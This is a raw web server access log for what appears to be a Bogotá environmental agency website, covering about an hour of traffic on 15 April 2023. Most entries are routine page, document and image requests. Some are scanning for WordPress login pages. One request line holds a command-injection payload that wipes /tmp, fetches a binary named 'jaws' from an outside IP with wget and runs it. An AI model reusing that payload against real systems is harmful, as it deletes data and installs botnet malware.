172.22.2.4 - - [15/Apr/2023:07:57:08 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-095-16.docx HTTP/1.1" 200 20284
172.22.2.4 - - [15/Apr/2023:07:55:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53924
181.54.149.132 - - [15/Apr/2023:07:57:44 -0500] "GET /florecio-la-herrania-en-el-tropicario-distrital-una-planta-nativa-de-la-amazonia-colombiana.html HTTP/1.1" 206 935
181.59.3.150 - - [15/Apr/2023:07:59:38 -0500] "GET /empresas-con-impacto-ambiental-positivo-unanse-a-la-edicion-2023-de-negocios-verdes-mas-cerca-de-ti.html HTTP/1.1" 200 878
201.245.192.253 - - [15/Apr/2023:07:59:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43322
216.245.221.92 - - [15/Apr/2023:08:00:06 -0500] "HEAD / HTTP/1.1" 200 -
34.231.174.129 - - [15/Apr/2023:08:00:21 -0500] "GET /wordpress/wp-login.php HTTP/1.1" 404 1018
178.33.233.108 - - [15/Apr/2023:08:00:57 -0500] "GET /bogota-se-prepara-para-tres-fines-de-semana-de-adopciones.html HTTP/1.1" 200 821
190.24.91.87 - - [15/Apr/2023:08:02:01 -0500] "GET /como-obtener-el-certificado-de-estado-de-conservacion-ambiental-ceca.html HTTP/1.1" 200 873
172.22.2.4 - - [15/Apr/2023:08:00:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [15/Apr/2023:08:01:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56754
201.245.192.253 - - [15/Apr/2023:08:04:56 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43322
216.245.221.92 - - [15/Apr/2023:08:05:06 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [15/Apr/2023:08:06:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [15/Apr/2023:08:07:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
141.95.168.55 - - [15/Apr/2023:08:09:27 -0500] "GET /wordpress/wp-login.php HTTP/1.1" 404 1018
172.22.2.4 - - [15/Apr/2023:08:09:57 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-095-16.docx HTTP/1.1" 200 20284
201.245.192.253 - - [15/Apr/2023:08:09:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43322
216.245.221.92 - - [15/Apr/2023:08:10:06 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.51 - - [15/Apr/2023:08:11:32 -0500] "-" 408 -
186.155.242.114 - - [15/Apr/2023:08:13:25 -0500] "GET /caminatas-ecologicas-en-bogota-inscribete-y-participa-en-los-recorridos-de-abril.html HTTP/1.1" 200 868
172.22.2.4 - - [15/Apr/2023:08:12:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [15/Apr/2023:08:14:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43322
172.22.2.4 - - [15/Apr/2023:08:13:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52326
216.245.221.92 - - [15/Apr/2023:08:15:06 -0500] "HEAD / HTTP/1.1" 200 -
49.7.20.75 - - [15/Apr/2023:08:16:03 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [15/Apr/2023:08:16:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
52.167.144.125 - - [15/Apr/2023:08:19:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/1562.pdf HTTP/1.1" 304 -
201.245.192.253 - - [15/Apr/2023:08:19:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42548
201.245.192.253 - - [15/Apr/2023:08:19:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43076
40.77.167.94 - - [15/Apr/2023:08:19:41 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
40.77.167.94 - - [15/Apr/2023:08:19:41 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12493
66.249.75.156 - - [15/Apr/2023:08:19:51 -0500] "-" 408 -
201.245.192.253 - - [15/Apr/2023:08:19:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43322
172.22.2.4 - - [15/Apr/2023:08:18:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [15/Apr/2023:08:20:06 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.213 - - [15/Apr/2023:08:20:48 -0500] "GET /forest/ HTTP/1.1" 200 12041
52.167.144.63 - - [15/Apr/2023:08:20:52 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12493
172.22.2.4 - - [15/Apr/2023:08:19:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
69.63.184.4 - - [15/Apr/2023:08:23:16 -0500] "GET /images/caminos-de-los-cerros-1_optimized.jpeg HTTP/1.1" 200 49537
172.22.2.4 - - [15/Apr/2023:08:22:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 62212
191.95.53.81 - - [15/Apr/2023:08:24:24 -0500] "GET / HTTP/1.1" 200 4720
191.95.53.81 - - [15/Apr/2023:08:24:25 -0500] "GET /fonts/icomoon/style.css HTTP/1.1" 200 79820
191.95.53.81 - - [15/Apr/2023:08:24:25 -0500] "GET /css/style.css HTTP/1.1" 200 3473
191.95.53.81 - - [15/Apr/2023:08:24:25 -0500] "GET /css/bootstrap.min.css HTTP/1.1" 200 178212
191.95.53.81 - - [15/Apr/2023:08:24:25 -0500] "GET /js/url.js HTTP/1.1" 404 1294
201.245.192.253 - - [15/Apr/2023:08:24:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43322
216.245.221.92 - - [15/Apr/2023:08:25:06 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [15/Apr/2023:08:24:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.94 - - [15/Apr/2023:08:26:25 -0500] "GET /BLA/resoluciones/AUTOS%202019/0554.pdf HTTP/1.1" 200 347429
172.22.2.4 - - [15/Apr/2023:08:25:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55934
172.22.2.4 - - [15/Apr/2023:08:27:28 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
69.171.251.117 - - [15/Apr/2023:08:29:25 -0500] "GET /images/incautan-animales-semana-santa-2023.jpeg HTTP/1.1" 200 36611
69.171.251.5 - - [15/Apr/2023:08:29:26 -0500] "GET /images/caminos-de-los-cerros-1_optimized.jpeg HTTP/1.1" 200 49537
69.171.251.21 - - [15/Apr/2023:08:29:26 -0500] "GET /images/Adopcion-gatos-y-perros-en-bogota-abril-23.jpeg HTTP/1.1" 200 68661
69.171.251.8 - - [15/Apr/2023:08:29:26 -0500] "GET /images/palma-de-cera-1-abril_optimized.jpeg HTTP/1.1" 200 171987
69.171.251.10 - - [15/Apr/2023:08:29:26 -0500] "GET /images/Fauna-silvestre-jornada-sensibilizacion-semana-santa.jpeg HTTP/1.1" 200 50019
69.171.251.15 - - [15/Apr/2023:08:29:26 -0500] "GET /images/rendicion-de-cuentas-post-01-02-(1)_optimized.jpg HTTP/1.1" 200 121430
69.171.251.13 - - [15/Apr/2023:08:29:26 -0500] "GET /images/atencion-al-ciudadano-abril.jpg HTTP/1.1" 200 116523
69.171.251.119 - - [15/Apr/2023:08:29:26 -0500] "GET /images/mejora-la-calidad-del-aire-en-bogota-5-abril.jpeg HTTP/1.1" 200 44341
69.171.251.17 - - [15/Apr/2023:08:29:26 -0500] "GET /images/WhatsApp%20Image%202023-04-05%20at%2013.54.41.jpeg HTTP/1.1" 200 210747
172.22.2.4 - - [15/Apr/2023:08:29:27 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [15/Apr/2023:08:29:27 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [15/Apr/2023:08:29:27 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [15/Apr/2023:08:29:27 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [15/Apr/2023:08:29:27 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [15/Apr/2023:08:29:28 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [15/Apr/2023:08:29:28 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [15/Apr/2023:08:29:28 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [15/Apr/2023:08:29:28 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [15/Apr/2023:08:29:28 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 200 14577
172.22.2.4 - - [15/Apr/2023:08:29:28 -0500] "GET /BLA/boletinlegal/images/arr_l.jpg HTTP/1.1" 200 1979
172.22.2.4 - - [15/Apr/2023:08:29:28 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
172.22.2.4 - - [15/Apr/2023:08:29:28 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [15/Apr/2023:08:29:28 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [15/Apr/2023:08:29:28 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [15/Apr/2023:08:29:28 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [15/Apr/2023:08:29:28 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [15/Apr/2023:08:29:28 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [15/Apr/2023:08:29:28 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
201.245.192.253 - - [15/Apr/2023:08:29:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42548
69.171.249.18 - - [15/Apr/2023:08:29:32 -0500] "GET /images/semana-bosques-1_optimized.1.jpg HTTP/1.1" 200 102892
201.245.192.253 - - [15/Apr/2023:08:29:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43076
172.22.2.4 - - [15/Apr/2023:08:29:34 -0500] "GET /BLA/boletinlegal/images/screen_2.png HTTP/1.1" 200 362502
172.22.2.4 - - [15/Apr/2023:08:29:34 -0500] "GET /BLA/boletinlegal/images/screen_3.png HTTP/1.1" 200 210620
172.22.2.4 - - [15/Apr/2023:08:29:34 -0500] "GET /BLA/boletinlegal/images/screen_5.png HTTP/1.1" 200 368876
172.22.2.4 - - [15/Apr/2023:08:29:34 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [15/Apr/2023:08:29:34 -0500] "GET /BLA/boletinlegal/images/arr_r.jpg HTTP/1.1" 200 1998
172.22.2.4 - - [15/Apr/2023:08:29:36 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
172.22.2.4 - - [15/Apr/2023:08:29:36 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [15/Apr/2023:08:29:36 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [15/Apr/2023:08:29:36 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [15/Apr/2023:08:29:37 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [15/Apr/2023:08:29:37 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [15/Apr/2023:08:29:37 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [15/Apr/2023:08:29:37 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [15/Apr/2023:08:29:37 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [15/Apr/2023:08:29:37 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [15/Apr/2023:08:29:37 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [15/Apr/2023:08:29:37 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [15/Apr/2023:08:29:37 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [15/Apr/2023:08:29:37 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [15/Apr/2023:08:29:37 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [15/Apr/2023:08:29:37 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [15/Apr/2023:08:29:37 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [15/Apr/2023:08:29:37 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
66.249.75.152 - - [15/Apr/2023:08:29:39 -0500] "-" 408 -
191.111.15.45 - - [15/Apr/2023:08:29:40 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13502
191.111.15.45 - - [15/Apr/2023:08:29:41 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 200 3049
191.111.15.45 - - [15/Apr/2023:08:29:41 -0500] "GET /BLA/resoluciones/dlf/folder.png HTTP/1.1" 200 410
191.111.15.45 - - [15/Apr/2023:08:29:41 -0500] "GET /BLA/resoluciones/dlf/bg.gif HTTP/1.1" 200 54
191.111.15.45 - - [15/Apr/2023:08:29:46 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 200 644
191.111.15.45 - - [15/Apr/2023:08:29:46 -0500] "GET /BLA/resoluciones/dlf/pdf.gif HTTP/1.1" 200 272
191.111.15.45 - - [15/Apr/2023:08:29:46 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2022%2F HTTP/1.1" 200 473234
201.245.192.253 - - [15/Apr/2023:08:29:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43322
216.245.221.92 - - [15/Apr/2023:08:30:06 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [15/Apr/2023:08:29:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 28619
34.91.133.126 - - [15/Apr/2023:08:30:24 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
34.141.140.189 - - [15/Apr/2023:08:31:06 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
172.22.2.4 - - [15/Apr/2023:08:30:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [15/Apr/2023:08:30:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57561
17.246.19.134 - - [15/Apr/2023:08:33:18 -0500] "-" 408 -
173.252.79.17 - - [15/Apr/2023:08:33:38 -0500] "GET /images/coop-inter-1_optimized.jpeg HTTP/1.1" 200 130861
149.202.87.164 - - [15/Apr/2023:08:34:06 -0500] "-" 408 -
186.155.130.231 - - [15/Apr/2023:08:34:21 -0500] "GET /empresas-con-impacto-ambiental-positivo-unanse-a-la-edicion-2023-de-negocios-verdes-mas-cerca-de-ti.html HTTP/1.1" 200 878
186.86.33.165 - - [15/Apr/2023:08:34:40 -0500] "GET /cuatro-animales-y-cerca-de-cinco-kilos-de-carne-de-especimenes-silvestres-fueron-incautados-en-los-ultimos-dias-en-bogota.html HTTP/1.1" 200 869
149.202.87.164 - - [15/Apr/2023:08:34:50 -0500] "-" 408 -
201.245.192.253 - - [15/Apr/2023:08:34:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43322
216.245.221.92 - - [15/Apr/2023:08:35:06 -0500] "HEAD / HTTP/1.1" 200 -
162.55.175.144 - - [15/Apr/2023:08:36:41 -0500] "GET / HTTP/1.1" 200 4720
162.55.175.144 - - [15/Apr/2023:08:36:44 -0500] "GET / HTTP/1.1" 200 319
40.77.167.94 - - [15/Apr/2023:08:37:27 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
172.22.2.4 - - [15/Apr/2023:08:35:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [15/Apr/2023:08:36:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
201.245.192.253 - - [15/Apr/2023:08:39:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42548
185.224.128.106 - - [15/Apr/2023:08:39:31 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [15/Apr/2023:08:39:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43076
34.141.140.189 - - [15/Apr/2023:08:39:36 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
201.245.192.253 - - [15/Apr/2023:08:39:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43322
40.77.167.94 - - [15/Apr/2023:08:40:03 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
216.245.221.92 - - [15/Apr/2023:08:40:06 -0500] "HEAD / HTTP/1.1" 200 -
190.69.239.144 - - [15/Apr/2023:08:40:08 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
190.69.239.144 - - [15/Apr/2023:08:40:08 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
190.69.239.144 - - [15/Apr/2023:08:40:08 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
172.22.2.4 - - [15/Apr/2023:08:41:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [15/Apr/2023:08:42:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
185.119.81.96 - - [15/Apr/2023:08:44:28 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.96 - - [15/Apr/2023:08:44:29 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
66.249.75.152 - - [15/Apr/2023:08:44:44 -0500] "-" 408 -
201.245.192.253 - - [15/Apr/2023:08:44:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43322
216.245.221.92 - - [15/Apr/2023:08:45:06 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [15/Apr/2023:08:48:43 -0500] "GET /BLA/boletinlegal/Circulares/2022/CIRCULAR%20No.%2000003%20DEL%2007%20DE%20MARZO%20DEL%202022.pdf HTTP/1.1" 200 311468
172.22.2.4 - - [15/Apr/2023:08:47:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [15/Apr/2023:08:49:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43322
172.22.2.4 - - [15/Apr/2023:08:48:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
216.245.221.92 - - [15/Apr/2023:08:50:06 -0500] "HEAD / HTTP/1.1" 200 -
192.144.114.69 - - [15/Apr/2023:08:51:00 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
192.144.114.69 - - [15/Apr/2023:08:51:01 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12171
192.144.114.69 - - [15/Apr/2023:08:51:01 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
192.144.114.69 - - [15/Apr/2023:08:51:01 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 304 -
192.144.114.69 - - [15/Apr/2023:08:51:01 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
192.144.114.69 - - [15/Apr/2023:08:51:01 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 304 -
192.144.114.69 - - [15/Apr/2023:08:51:01 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
192.144.114.69 - - [15/Apr/2023:08:51:01 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 304 -
192.144.114.69 - - [15/Apr/2023:08:51:01 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 304 -
192.144.114.69 - - [15/Apr/2023:08:51:01 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
192.144.114.69 - - [15/Apr/2023:08:51:01 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
192.144.114.69 - - [15/Apr/2023:08:51:01 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
192.144.114.69 - - [15/Apr/2023:08:51:01 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
192.144.114.69 - - [15/Apr/2023:08:51:02 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 304 -
192.144.114.69 - - [15/Apr/2023:08:51:02 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 304 -
192.144.114.69 - - [15/Apr/2023:08:51:02 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.30.30.67 - - [15/Apr/2023:08:51:27 -0500] "GET / HTTP/1.1" 200 4720
181.52.175.42 - - [15/Apr/2023:08:54:43 -0500] "GET /catalogoisis/ HTTP/1.1" 200 8575
181.52.175.42 - - [15/Apr/2023:08:54:43 -0500] "GET /catalogoisis/Css/Busqueda.css HTTP/1.1" 200 1995
181.52.175.42 - - [15/Apr/2023:08:54:43 -0500] "GET /catalogoisis/Js/AceptarLimpiar.js HTTP/1.1" 200 331
181.52.175.42 - - [15/Apr/2023:08:54:43 -0500] "GET /catalogoisis/Js/CriterioCombinada.js HTTP/1.1" 200 1843
181.52.175.42 - - [15/Apr/2023:08:54:43 -0500] "GET /catalogoisis/Js/Cookies.js HTTP/1.1" 200 1369
181.52.175.42 - - [15/Apr/2023:08:54:43 -0500] "GET /catalogoisis/Js/LimpiarCombinada.js HTTP/1.1" 200 207
181.52.175.42 - - [15/Apr/2023:08:54:43 -0500] "GET /catalogoisis/Js/Remote.js HTTP/1.1" 200 436
181.52.175.42 - - [15/Apr/2023:08:54:43 -0500] "GET /catalogoisis/Js/Go.js HTTP/1.1" 200 364
181.52.175.42 - - [15/Apr/2023:08:54:43 -0500] "GET /catalogoisis/Js/Numero.js HTTP/1.1" 200 398
181.52.175.42 - - [15/Apr/2023:08:54:43 -0500] "GET /catalogoisis/Js/Enter.js HTTP/1.1" 200 1208
181.52.175.42 - - [15/Apr/2023:08:54:43 -0500] "GET /catalogoisis/imagenes/br1c3.gif HTTP/1.1" 200 302
181.52.175.42 - - [15/Apr/2023:08:54:43 -0500] "GET /catalogoisis/imagenes/br1c1.gif HTTP/1.1" 200 172
181.52.175.42 - - [15/Apr/2023:08:54:43 -0500] "GET /catalogoisis/imagenes/Turnbo1.gif HTTP/1.1" 200 227
181.52.175.42 - - [15/Apr/2023:08:54:43 -0500] "GET /catalogoisis/imagenes/aceptar1.gif HTTP/1.1" 200 604
181.52.175.42 - - [15/Apr/2023:08:54:43 -0500] "GET /catalogoisis/imagenes/limpiar1.gif HTTP/1.1" 200 606
181.52.175.42 - - [15/Apr/2023:08:54:43 -0500] "GET /catalogoisis/imagenes/br3c3.gif HTTP/1.1" 200 186
181.52.175.42 - - [15/Apr/2023:08:54:43 -0500] "GET /catalogoisis/imagenes/br2c2.gif HTTP/1.1" 200 302
181.52.175.42 - - [15/Apr/2023:08:54:43 -0500] "GET /catalogoisis/imagenes/br1c2.gif HTTP/1.1" 200 297
181.52.175.42 - - [15/Apr/2023:08:54:43 -0500] "GET /catalogoisis/imagenes/br2c1.gif HTTP/1.1" 200 297
181.52.175.42 - - [15/Apr/2023:08:54:43 -0500] "GET /catalogoisis/imagenes/Header.gif HTTP/1.1" 200 30313
181.52.175.42 - - [15/Apr/2023:08:54:43 -0500] "GET /catalogoisis/imagenes/br2c3.gif HTTP/1.1" 200 416
181.52.175.42 - - [15/Apr/2023:08:54:43 -0500] "GET /catalogoisis/imagenes/br3c2.gif HTTP/1.1" 200 285
181.52.175.42 - - [15/Apr/2023:08:54:43 -0500] "GET /catalogoisis/imagenes/br3c1.gif HTTP/1.1" 200 177
181.52.175.42 - - [15/Apr/2023:08:54:43 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [15/Apr/2023:08:54:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43322
172.22.2.4 - - [15/Apr/2023:08:53:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [15/Apr/2023:08:55:06 -0500] "HEAD / HTTP/1.1" 200 -
31.13.127.12 - - [15/Apr/2023:08:55:41 -0500] "GET /incautadas-cuatro-aves-y-mas-9-mil-gramos-de-productos-de-fauna-silvestre.html HTTP/1.1" 206 884
172.22.2.4 - - [15/Apr/2023:08:54:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52730
172.22.2.4 - - [15/Apr/2023:08:57:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
66.220.149.14 - - [15/Apr/2023:08:57:54 -0500] "GET /distrito-levanta-alerta-fase-1-por-calidad-del-aire-en-bogota-llamado-a-no-bajar-la-guardia-y-seguir-reduciendo-emisiones.html HTTP/1.1" 206 908
66.220.149.10 - - [15/Apr/2023:08:57:54 -0500] "GET /distrito-levanta-alerta-fase-1-por-calidad-del-aire-en-bogota-llamado-a-no-bajar-la-guardia-y-seguir-reduciendo-emisiones.html HTTP/1.1" 206 908
52.167.144.132 - - [15/Apr/2023:08:58:11 -0500] "-" 408 -
201.245.192.253 - - [15/Apr/2023:08:59:47 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43322
216.245.221.92 - - [15/Apr/2023:09:00:06 -0500] "HEAD / HTTP/1.1" 200 -
168.119.253.69 - - [15/Apr/2023:09:00:07 -0500] "GET / HTTP/1.1" 200 319
168.119.253.69 - - [15/Apr/2023:09:00:07 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [15/Apr/2023:08:59:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [15/Apr/2023:09:00:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54424
222.10.254.113 - - [15/Apr/2023:09:02:27 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+167.71.210.63/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
199.16.157.181 - - [15/Apr/2023:09:03:31 -0500] "GET /images/Floreci%C3%B3-la-herrania-en-el-Tropicario-del-Jard%C3%ADn-Bot%C3%A1nico.jpeg HTTP/1.1" 404 1034
199.16.157.181 - - [15/Apr/2023:09:04:08 -0500] "GET /florecio-la-herrania-en-el-tropicario-distrital-una-planta-nativa-de-la-amazonia-colombiana.html HTTP/1.1" 200 935
199.16.157.180 - - [15/Apr/2023:09:04:08 -0500] "GET /images/Floreci%C3%B3-la-herrania-en-el-Tropicario-del-Jard%C3%ADn-Bot%C3%A1nico.jpeg HTTP/1.1" 404 1034
199.16.157.182 - - [15/Apr/2023:09:04:18 -0500] "GET /images/Floreci%C3%B3-la-herrania-en-el-Tropicario-del-Jard%C3%ADn-Bot%C3%A1nico.jpeg HTTP/1.1" 404 1034
173.252.107.1 - - [15/Apr/2023:09:04:20 -0500] "GET /images/caminos-de-los-cerros-1_optimized.jpeg HTTP/1.1" 200 49537
173.252.107.12 - - [15/Apr/2023:09:04:20 -0500] "GET /images/mejora-la-calidad-del-aire-en-bogota-5-abril.jpeg HTTP/1.1" 200 44341
173.252.107.3 - - [15/Apr/2023:09:04:24 -0500] "GET /images/idpyba-4-marzo-1_optimized.jpeg HTTP/1.1" 200 115318
173.252.107.116 - - [15/Apr/2023:09:04:24 -0500] "GET /images/calidad-del-aire-suroccidental_optimized.jpeg HTTP/1.1" 200 175446
